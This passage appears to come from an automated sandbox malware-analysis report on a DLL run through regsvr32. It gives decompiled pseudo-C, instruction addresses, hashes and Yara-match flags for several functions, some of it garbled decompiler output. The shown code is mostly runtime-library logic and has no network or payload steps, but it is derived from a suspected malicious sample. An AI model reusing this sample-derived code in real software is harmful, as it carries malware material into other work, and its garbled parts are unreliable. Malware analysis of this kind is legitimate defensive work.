				_t113 =  *(__rcx + 0x30);
				_a8 = 0;
				_a10 = 0;
				if ((r15b & 0) == 0) goto 0x8001ef21;
				if ((r15b & 0) == 0) goto 0x8001ef04;
				_a8 = 0x2d;
				goto 0x8001ef1e;
				if ((r15b & _t113) == 0) goto 0x8001ef10;
				_a8 = 0x2b;
				goto 0x8001ef1e;
				if ((r15b & 0) == 0) goto 0x8001ef21;
				_a8 = 0x20;
				_t174 = _t192;
				_t105 =  *((intOrPtr*)(__rcx + 0x41));
				if (0 != 0) goto 0x8001ef3a;
				if ((r15b & 0) == 0) goto 0x8001ef3a;
				r8b = r15b;
				goto 0x8001ef3d;
				r8b = 0;
				if (r8b != 0) goto 0x8001ef4e;
				if (0 == 0) goto 0x8001ef78;
				 *((char*)(_t183 + _t174 + 0x50)) = 0x30;
				if (_t105 == 0x58) goto 0x8001ef64;
				if (_t105 == 0x41) goto 0x8001ef64;
				goto 0x8001ef67;
				asm("sbb al, al");
				 *((char*)(_t183 + _t174 + _t192 + 0x50)) = ( ~r15b & 0x000000e0) + 0x78;
				_t122 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
				if ((_t113 & 0x0000000c) != 0) goto 0x8001ef9a;
				r8d = _t122;
				E0000000118001766C(0x20, __rcx, __rcx + 0x468, _t174 + _t192 + _t192, _t177, __rbp, __rcx + 0x28);
				_t180 = __rcx + 0x28;
				_v40 =  *((intOrPtr*)(__rcx + 0x10));
				r8d = 0;
				E0000000118002885C(__rcx, __rcx + 0x468,  &_a8, _t177, _t180, _t180);
				_t106 =  *(__rcx + 0x30);
				if ((r15b & _t106 >> 0x00000003) == 0) goto 0x8001efe6;
				if ((r15b & _t106 >> 0x00000002) != 0) goto 0x8001efe6;
				r8d = _t122;
				E0000000118001766C(0x30, __rcx, __rcx + 0x468, _t174 + _t192 + _t192, _t177, _t180, _t180);
				E00000001180027F68(__rcx, __rcx, _t177);
				if ( *_t180 < 0) goto 0x8001f011;
				if ((r15b &  *(__rcx + 0x30) >> 0x00000002) == 0) goto 0x8001f011;
				r8d = _t122;
				E0000000118001766C(0x20, __rcx, __rcx + 0x468, _t174 + _t192 + _t192, _t177, _t180, _t180);
				return r15b;
			}























                                                                                                    0x18001edb4
                                                                                                    0x18001edb4
                                                                                                    0x18001edb4
                                                                                                    0x18001edb4
                                                                                                    0x18001edb9
                                                                                                    0x18001edbe
                                                                                                    0x18001edc8
                                                                                                    0x18001edcc
                                                                                                    0x18001edd3
                                                                                                    0x18001edd9
                                                                                                    0x18001eddc
                                                                                                    0x18001edde
                                                                                                    0x18001ede7
                                                                                                    0x18001edf0
                                                                                                    0x18001edf5
                                                                                                    0x18001edfe
                                                                                                    0x18001ee07
                                                                                                    0x18001ee0c
                                                                                                    0x18001ee11
                                                                                                    0x18001ee16
                                                                                                    0x18001ee1f
                                                                                                    0x18001ee27
                                                                                                    0x18001ee2c
                                                                                                    0x18001ee31
                                                                                                    0x18001ee36
                                                                                                    0x18001ee3e
                                                                                                    0x18001ee43
                                                                                                    0x18001ee48
                                                                                                    0x18001ee4d
                                                                                                    0x18001ee52
                                                                                                    0x18001ee57
                                                                                                    0x18001ee5c
                                                                                                    0x18001ee61
                                                                                                    0x18001ee66
                                                                                                    0x18001ee68
                                                                                                    0x18001ee6d
                                                                                                    0x18001ee6f
                                                                                                    0x18001ee76
                                                                                                    0x18001ee7d
                                                                                                    0x18001ee85
                                                                                                    0x18001ee87
                                                                                                    0x18001ee92
                                                                                                    0x18001ee94
                                                                                                    0x18001ee98
                                                                                                    0x18001eea3
                                                                                                    0x18001eea5
                                                                                                    0x18001eeaa
                                                                                                    0x18001eeac
                                                                                                    0x18001eeb5
                                                                                                    0x18001eeb8
                                                                                                    0x18001eebd
                                                                                                    0x18001eec6
                                                                                                    0x18001eeca
                                                                                                    0x18001eed3
                                                                                                    0x18001eed9
                                                                                                    0x18001eede
                                                                                                    0x18001eee5
                                                                                                    0x18001eef1
                                                                                                    0x18001eefb
                                                                                                    0x18001eefd
                                                                                                    0x18001ef02
                                                                                                    0x18001ef07
                                                                                                    0x18001ef09
                                                                                                    0x18001ef0e
                                                                                                    0x18001ef17
                                                                                                    0x18001ef19
                                                                                                    0x18001ef1e
                                                                                                    0x18001ef21
                                                                                                    0x18001ef29
                                                                                                    0x18001ef33
                                                                                                    0x18001ef35
                                                                                                    0x18001ef38
                                                                                                    0x18001ef3a
                                                                                                    0x18001ef48
                                                                                                    0x18001ef4c
                                                                                                    0x18001ef4e
                                                                                                    0x18001ef59
                                                                                                    0x18001ef5e
                                                                                                    0x18001ef62
                                                                                                    0x18001ef69
                                                                                                    0x18001ef71
                                                                                                    0x18001ef7e
                                                                                                    0x18001ef83
                                                                                                    0x18001ef89
                                                                                                    0x18001ef95
                                                                                                    0x18001ef9e
                                                                                                    0x18001efa9
                                                                                                    0x18001efb9
                                                                                                    0x18001efbc
                                                                                                    0x18001efc1
                                                                                                    0x18001efcc
                                                                                                    0x18001efd4
                                                                                                    0x18001efd9
                                                                                                    0x18001efe1
                                                                                                    0x18001efeb
                                                                                                    0x18001eff4
                                                                                                    0x18001efff
                                                                                                    0x18001f004
                                                                                                    0x18001f00c
                                                                                                    0x18001f02c

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                    • Opcode ID: 68cd0274ea1b2fe25151a2780115190214eb8fa6fc1ee587d821a507d8b5eb72
                                                                                                    • Instruction ID: 2f6c6c8bdf6d21ec693f4487e45fc909f47cfd0554df673dfeb34a2234e27ee1
                                                                                                    • Opcode Fuzzy Hash: 68cd0274ea1b2fe25151a2780115190214eb8fa6fc1ee587d821a507d8b5eb72
                                                                                                    • Instruction Fuzzy Hash: 6E71A332204EC846FBEB8A1990403ED67D1A34FBC8F64851AFD419B6DACF25DA4EC701
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02626F6C Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HmT'
                                                                                                    • API String ID: 0-1144445574
                                                                                                    • Opcode ID: 42c31c01aa1bbabb78b257e72ff2729693090a5ba09290020de699eaf487dc1d
                                                                                                    • Instruction ID: 937d8dd7257389fb241f22089373839dbb2c578da920be910425b6b781709739
                                                                                                    • Opcode Fuzzy Hash: 42c31c01aa1bbabb78b257e72ff2729693090a5ba09290020de699eaf487dc1d
                                                                                                    • Instruction Fuzzy Hash: CEB169B590234DCFDB98CF68C29A59E7BF1FF45308F404119EC0A9A294D7B4D529CB89
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02619318 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: +8U
                                                                                                    • API String ID: 0-4062457431
                                                                                                    • Opcode ID: 0124e8dd2b5fc9bd84271919cbcb45f18eaabc4edc312cdca77e532e8a7d5fc3
                                                                                                    • Instruction ID: 58590b56142c7a1ed0674dd5c75281387de4baf9971104ab1a355de0ec15a6f2
                                                                                                    • Opcode Fuzzy Hash: 0124e8dd2b5fc9bd84271919cbcb45f18eaabc4edc312cdca77e532e8a7d5fc3
                                                                                                    • Instruction Fuzzy Hash: B0A1C4719047888BDBB9DFA8C8996DDBBF1FB48348F60421EDC0AAB251D7B45644CF01
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260A0C0 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: [Vz(
                                                                                                    • API String ID: 0-3038526523
                                                                                                    • Opcode ID: 04d8ee90b1c6f1bb7be9f2cc897bda90a8d93408e5d02ec0e13ed055f9373eed
                                                                                                    • Instruction ID: 96f72eae211ec23ef4b14e6a1b3df38014cdea031c86e07b84ff6737853ff254
                                                                                                    • Opcode Fuzzy Hash: 04d8ee90b1c6f1bb7be9f2cc897bda90a8d93408e5d02ec0e13ed055f9373eed
                                                                                                    • Instruction Fuzzy Hash: 3D611339507749CBDB28CF78D0C95993BE4EF65348F20412DE86A872A3D774D825CB49
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02620680 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: B&2
                                                                                                    • API String ID: 0-2478967441
                                                                                                    • Opcode ID: 23852161bade86b58a00cbc692bc4152087dbe6c6ea0b14702877e6fffdfc2cf
                                                                                                    • Instruction ID: aab9404b772019417607d6eb41d693ec3111dd7c718b1901dff73db43949b235
                                                                                                    • Opcode Fuzzy Hash: 23852161bade86b58a00cbc692bc4152087dbe6c6ea0b14702877e6fffdfc2cf
                                                                                                    • Instruction Fuzzy Hash: A15114B0A0474A8BDB4DDF28D5C749F3FA1EB64388F20411CEC468A2A0D774D6A5CBC1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260E846 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: U
                                                                                                    • API String ID: 0-724583121
                                                                                                    • Opcode ID: e662e908d77c8dc5d34bbcf3b692402eb17caf7d958b53e445704949976b5b49
                                                                                                    • Instruction ID: 236cc983af6869f20229f84626991d214059c50984834a3d30c23ec9967c0258
                                                                                                    • Opcode Fuzzy Hash: e662e908d77c8dc5d34bbcf3b692402eb17caf7d958b53e445704949976b5b49
                                                                                                    • Instruction Fuzzy Hash: E76136B090034A8FEB18CF24D88A4DE7FA1FB58358F10461DF85A9A290D7B8D665CFC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180011314 Relevance: 1.4, Strings: 1, Instructions: 139COMMONLIBRARYCODECrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 49%
                                                                                                    			E00000001180011314(void* __eax, signed int __edx, long long __rbx, signed long long*** __rcx, long long __rdi, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t28;
				signed int _t56;
				void* _t68;
				signed long long _t69;
				void* _t74;
				signed int* _t80;
				signed long long _t82;
				signed long long _t84;
				signed long long _t85;
				signed long long _t101;
				signed long long _t102;
				signed long long _t104;
				signed long long _t110;
				signed long long _t112;
				void* _t121;
				signed long long _t124;
				signed long long _t125;
				signed long long _t126;
				signed long long* _t131;
				void* _t132;
				signed long long _t136;
				signed long long*** _t139;

				_t112 = __rsi;
				_t56 = __edx;
				_t68 = _t121;
				 *((long long*)(_t68 + 8)) = __rbx;
				 *((long long*)(_t68 + 0x10)) = __rbp;
				 *((long long*)(_t68 + 0x18)) = __rsi;
				 *((long long*)(_t68 + 0x20)) = __rdi;
				_push(_t132);
				_t69 =  *((intOrPtr*)(__rcx));
				_t139 = __rcx;
				_t80 =  *_t69;
				if (_t80 != 0) goto 0x80011349;
				goto 0x800114cf;
				_t124 =  *0x8005d010; // 0xb03f6156e10
				r12d = 0x40;
				_t117 =  *_t80 ^ _t124;
				asm("dec eax");
				_t82 = _t80[4] ^ _t124;
				asm("dec ecx");
				asm("dec eax");
				if ((_t80[2] ^ _t124) != _t82) goto 0x80011449;
				_t84 = _t82 - ( *_t80 ^ _t124) >> 3;
				_t107 =  >  ? _t69 : _t84;
				_t108 = ( >  ? _t69 : _t84) + _t84;
				_t109 =  ==  ? _t69 : ( >  ? _t69 : _t84) + _t84;
				if (( ==  ? _t69 : ( >  ? _t69 : _t84) + _t84) - _t84 < 0) goto 0x800113c8;
				r8d = _t132 - 0x38;
				E00000001180031514(_t132 - 0x20, _t84,  *_t80 ^ _t124,  ==  ? _t69 : ( >  ? _t69 : _t84) + _t84, __rsi, _t117, _t124);
				_t28 = E0000000118002E8A0(_t69, _t117);
				if (_t69 != 0) goto 0x800113f0;
				_t110 = _t84 + 4;
				r8d = 8;
				E00000001180031514(_t28, _t84, _t117, _t110, _t112, _t117, _t124);
				_t136 = _t69;
				E0000000118002E8A0(_t69, _t117);
				if (_t136 == 0) goto 0x80011341;
				_t125 =  *0x8005d010; // 0xb03f6156e10
				_t131 = _t136 + _t84 * 8;
				_t85 = _t136 + _t110 * 8;
				asm("dec eax");
				_t74 =  >  ? _t112 : _t85 - _t131 + 7 >> 3;
				if (_t74 == 0) goto 0x80011449;
				 *_t131 = _t112 ^ _t125;
				if (_t112 + 1 != _t74) goto 0x80011433;
				_t126 =  *0x8005d010; // 0xb03f6156e10
				asm("dec eax");
				_t16 =  &(_t131[1]); // 0x180001639
				 *_t131 =  *(_t139[1]) ^ _t126;
				_t101 =  *0x8005d010; // 0xb03f6156e10
				asm("dec eax");
				 *( *( *_t139)) = _t136 ^ _t101;
				_t102 =  *0x8005d010; // 0xb03f6156e10
				asm("dec ecx");
				( *( *_t139))[1] = _t16 ^ _t102;
				_t104 =  *0x8005d010; // 0xb03f6156e10
				r12d = r12d - (_t56 & 0x0000003f);
				asm("dec eax");
				( *( *_t139))[2] = _t85 ^ _t104;
				return 0;
			}

























                                                                                                    0x180011314
                                                                                                    0x180011314
                                                                                                    0x180011314
                                                                                                    0x180011317
                                                                                                    0x18001131b
                                                                                                    0x18001131f
                                                                                                    0x180011323
                                                                                                    0x180011327
                                                                                                    0x180011331
                                                                                                    0x180011336
                                                                                                    0x180011339
                                                                                                    0x18001133f
                                                                                                    0x180011344
                                                                                                    0x180011349
                                                                                                    0x180011350
                                                                                                    0x180011367
                                                                                                    0x18001136d
                                                                                                    0x180011370
                                                                                                    0x180011373
                                                                                                    0x180011376
                                                                                                    0x18001137c
                                                                                                    0x18001138a
                                                                                                    0x180011394
                                                                                                    0x18001139d
                                                                                                    0x1800113a0
                                                                                                    0x1800113a7
                                                                                                    0x1800113a9
                                                                                                    0x1800113b4
                                                                                                    0x1800113be
                                                                                                    0x1800113c6
                                                                                                    0x1800113c8
                                                                                                    0x1800113cc
                                                                                                    0x1800113d8
                                                                                                    0x1800113df
                                                                                                    0x1800113e2
                                                                                                    0x1800113ea
                                                                                                    0x1800113f0
                                                                                                    0x1800113f7
                                                                                                    0x1800113fe
                                                                                                    0x18001140d
                                                                                                    0x18001142a
                                                                                                    0x180011431
                                                                                                    0x180011436
                                                                                                    0x180011440
                                                                                                    0x180011442
                                                                                                    0x18001145e
                                                                                                    0x180011464
                                                                                                    0x180011468
                                                                                                    0x18001146b
                                                                                                    0x18001147e
                                                                                                    0x180011487
                                                                                                    0x18001148d
                                                                                                    0x18001149e
                                                                                                    0x1800114a7
                                                                                                    0x1800114ab
                                                                                                    0x1800114b7
                                                                                                    0x1800114c0
                                                                                                    0x1800114cb
                                                                                                    0x1800114ed

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: 44997661b284f8eab975af77740b21862a5012cd8d13f731aaadbe28ea9cdc85
                                                                                                    • Instruction ID: b58ca0587d0613bdd1fa75abc7975f4ad99ef03d696516058b27237089162a55
                                                                                                    • Opcode Fuzzy Hash: 44997661b284f8eab975af77740b21862a5012cd8d13f731aaadbe28ea9cdc85
                                                                                                    • Instruction Fuzzy Hash: 4B417072310A588AEB89CF6AD8143D963A1B34CFD0F49A027EE5D97754EE39C646C300
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180042C2C Relevance: 1.4, APIs: 1, Instructions: 137COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 79%
                                                                                                    			E00000001180042C2C(void* __ecx, void* __edx, void* __rcx, void* __r8, signed long long* _a40) {
				signed int _v72;
				char _v200;
				signed int _v216;
				intOrPtr _v232;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* _t14;
				intOrPtr _t41;
				intOrPtr _t45;
				signed long long _t60;
				signed long long _t61;
				signed long long _t62;
				void* _t63;
				void* _t64;
				signed long long _t65;
				signed long long _t85;
				signed long long* _t86;
				void* _t87;
				signed long long _t88;
				void* _t97;

				_t60 =  *0x8005d010; // 0xb03f6156e10
				_t61 = _t60 ^ _t88;
				_v72 = _t61;
				_t86 = _a40;
				_t45 = r9d;
				_t97 = __r8;
				 *_t86 = _t85;
				if (__edx != 1) goto 0x80042d49;
				_v232 = 0x80;
				r8d = _t45;
				_t14 = E00000001180042A8C(__ecx, __edx - 1, _t63, __rcx, __r8, _t85, _t86, __r8,  &_v200, __rcx);
				_t64 = _t14;
				if (_t14 == 0) goto 0x80042cd1;
				_t5 = _t85 + 1; // 0x1
				E0000000118002E7AC(_t14, _t64, __r8);
				 *_t86 = _t61;
				E0000000118002E8A0(_t61, _t64);
				if ( *_t86 == _t85) goto 0x80042dba;
				_t6 = _t64 - 1; // -1
				if (E00000001180038BF0(_t5, _t61, _t64,  *_t86, _t64, _t6) != 0) goto 0x80042ddf;
				goto 0x80042dbd;
				if (GetLastError() != 0x7a) goto 0x80042dba;
				r9d = 0;
				_v232 = 0;
				r8d = _t45;
				if (E00000001180042A8C(0, GetLastError() - 0x7a, _t64, __rcx, _t97, _t85, _t86,  &_v200, _t6, __rcx) == 0) goto 0x80042dba;
				E0000000118002E7AC(_t21, _t21, _t97);
				_t65 = _t61;
				if (_t61 == 0) goto 0x80042d3a;
				_v232 = r15d;
				r8d = _t45;
				if (E00000001180042A8C(0, _t61, _t65, __rcx, _t97, _t85, _t86,  &_v200, _t61, __rcx) == 0) goto 0x80042d3a;
				_t62 = _t65;
				 *_t86 = _t62;
				goto 0x80042d3d;
				E0000000118002E8A0(_t62, _t85);
				goto 0x80042dbd;
				if (1 != 2) goto 0x80042d8d;
				r9d = 0;
				r8d = 0;
				if (E0000000118002D69C(_t45, 1 - 2, _t85, _t97, _t85, _t86, _t87,  &_v200) == 0) goto 0x80042dba;
				E0000000118002E7AC(_t26, _t26, _t97);
				if (_t62 == 0) goto 0x80042d3a;
				r9d = r15d;
				_t41 = _t45;
				E0000000118002D69C(_t41, _t62, _t62, _t97, _t85, _t86, _t87, _t62);
				goto 0x80042d2b;
				if (_t41 != 0) goto 0x80042dba;
				asm("bts ebp, 0x1d");
				_v216 = 0xffffffff;
				r9d = 2;
				if (E0000000118002D69C(_t45, _t41, _t62, _t97, _t85, _t86, _t87,  &_v216) == 0) goto 0x80042dba;
				 *_t86 = _v216;
				goto 0x80042cca;
				return E000000011800010E0(_v216 | 0xffffffff, 0, _v72 ^ _t88);
			}


























                                                                                                    0x180042c3e
                                                                                                    0x180042c45
                                                                                                    0x180042c48
                                                                                                    0x180042c50
                                                                                                    0x180042c5a
                                                                                                    0x180042c5d
                                                                                                    0x180042c63
                                                                                                    0x180042c69
                                                                                                    0x180042c74
                                                                                                    0x180042c7c
                                                                                                    0x180042c82
                                                                                                    0x180042c87
                                                                                                    0x180042c8c
                                                                                                    0x180042c8e
                                                                                                    0x180042c94
                                                                                                    0x180042c9b
                                                                                                    0x180042c9e
                                                                                                    0x180042ca6
                                                                                                    0x180042caf
                                                                                                    0x180042cc4
                                                                                                    0x180042ccc
                                                                                                    0x180042cda
                                                                                                    0x180042ce0
                                                                                                    0x180042ce3
                                                                                                    0x180042ce7
                                                                                                    0x180042cfa
                                                                                                    0x180042d08
                                                                                                    0x180042d0d
                                                                                                    0x180042d13
                                                                                                    0x180042d18
                                                                                                    0x180042d1d
                                                                                                    0x180042d2d
                                                                                                    0x180042d2f
                                                                                                    0x180042d35
                                                                                                    0x180042d38
                                                                                                    0x180042d40
                                                                                                    0x180042d47
                                                                                                    0x180042d50
                                                                                                    0x180042d52
                                                                                                    0x180042d55
                                                                                                    0x180042d67
                                                                                                    0x180042d6e
                                                                                                    0x180042d79
                                                                                                    0x180042d7b
                                                                                                    0x180042d81
                                                                                                    0x180042d86
                                                                                                    0x180042d8b
                                                                                                    0x180042d8f
                                                                                                    0x180042d91
                                                                                                    0x180042d95
                                                                                                    0x180042da0
                                                                                                    0x180042dad
                                                                                                    0x180042db3
                                                                                                    0x180042db5
                                                                                                    0x180042dde

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3806578645-0
                                                                                                    • Opcode ID: b52a3d9219e6ea6ab6fa0be05ca3aa28c3bcc0f6c07302c787b5be4b123604be
                                                                                                    • Instruction ID: 0af4f6c42a98f131102687e9c405b204269d6983b54724f91f659d4071d8b9ca
                                                                                                    • Opcode Fuzzy Hash: b52a3d9219e6ea6ab6fa0be05ca3aa28c3bcc0f6c07302c787b5be4b123604be
                                                                                                    • Instruction Fuzzy Hash: D241CC31701A4941FAF39E2668A17EA7781BB8D7C8F86C525BE49477C5DE38C6094708
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260C830 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: )T
                                                                                                    • API String ID: 0-1771641081
                                                                                                    • Opcode ID: b426f4efb5ac64583d466fca07f4943afedfdc6c2a6abf74f4b677fab873c869
                                                                                                    • Instruction ID: 6e98766355dfc5e0c73244e834519ceedb4ef49245c76ced985cb4bf3c18bbc3
                                                                                                    • Opcode Fuzzy Hash: b426f4efb5ac64583d466fca07f4943afedfdc6c2a6abf74f4b677fab873c869
                                                                                                    • Instruction Fuzzy Hash: 0151A370558788CBDBBADF38C8896D97BB1FB58304F90821DDC4E8A290DB74964ACB41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02625F74 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: |k
                                                                                                    • API String ID: 0-406035669
                                                                                                    • Opcode ID: f4a82254235d292a0ed8ec98dba5ba6ed40e15c1916d3402663e9666fcf7706c
                                                                                                    • Instruction ID: eb8838c792b91155a455b76c7861029395befb509effb62e6c4417ba07e4fa30
                                                                                                    • Opcode Fuzzy Hash: f4a82254235d292a0ed8ec98dba5ba6ed40e15c1916d3402663e9666fcf7706c
                                                                                                    • Instruction Fuzzy Hash: D5412B7061C7848FD7A8DF28D48579AB7E1FB88314F50892DE88DC7395CB749485CB46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026212E8 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0(C
                                                                                                    • API String ID: 0-623082255
                                                                                                    • Opcode ID: 5726a938d1549c1f8208f3a7beef01f3187edbd1a19280d2bd8da320f24ed46b
                                                                                                    • Instruction ID: a79a113d76d679c838c457a9e9a78fdb0d2cfa99f9e5775ab6a54b7c313e7d5b
                                                                                                    • Opcode Fuzzy Hash: 5726a938d1549c1f8208f3a7beef01f3187edbd1a19280d2bd8da320f24ed46b
                                                                                                    • Instruction Fuzzy Hash: 265190B190034A8BDB48CF68D88A4DE7FB0FB64398F604219E855A72A0D374D6A5CBC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260E888 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: U
                                                                                                    • API String ID: 0-724583121
                                                                                                    • Opcode ID: cccf99dc56b9cb7091bf9c3ec26e495dd403f73092a6cfe3c4f9f21295d341a6
                                                                                                    • Instruction ID: 0a432ab5ce5543d652ea80b99dc69b1ee2c8baddb4a61b74a4bc892bc5c424ed
                                                                                                    • Opcode Fuzzy Hash: cccf99dc56b9cb7091bf9c3ec26e495dd403f73092a6cfe3c4f9f21295d341a6
